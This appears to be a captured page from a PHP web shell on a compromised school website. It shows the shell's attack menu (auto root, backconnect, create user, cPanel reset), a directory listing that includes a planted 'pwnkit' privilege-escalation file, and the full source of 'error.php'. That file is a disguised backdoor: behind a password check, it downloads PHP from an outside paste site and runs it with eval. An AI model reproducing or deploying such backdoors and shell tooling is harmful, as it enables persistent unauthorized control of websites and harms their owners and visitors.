Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.138.135.4
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
dhindsa /
back /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
.htaccess
204
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.46
KB
-rw-r--r--
academic.php
10.44
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
admin.php
2.85
KB
-rw-r--r--
cbse-corner.php
3.5
KB
-rw-r--r--
config.php
664
B
-rw-r--r--
contact.php
1.8
KB
-rw-r--r--
error.php
2.47
KB
-rw-r--r--
error_log
667.17
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
5.98
KB
-rw-r--r--
gallery.php
1.54
KB
-rw-r--r--
header.php
10.79
KB
-rw-r--r--
index.php
22.52
KB
-r--r--r--
news-coverage.php
1.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rw-r--r--
tc.php
3.14
KB
-rw-r--r--
theschool.php
7.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error.php
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '336ba00dff86b0d877db154c250090ed'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; // Replace this with your cookie data } else { // Password is incorrect echo "Incorrect password. Please try again."; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://pst.innomi.net/paste/tf9g7y8cmow5xhmsjjoh7jpn/raw'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <form method="POST" action=""> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>
Close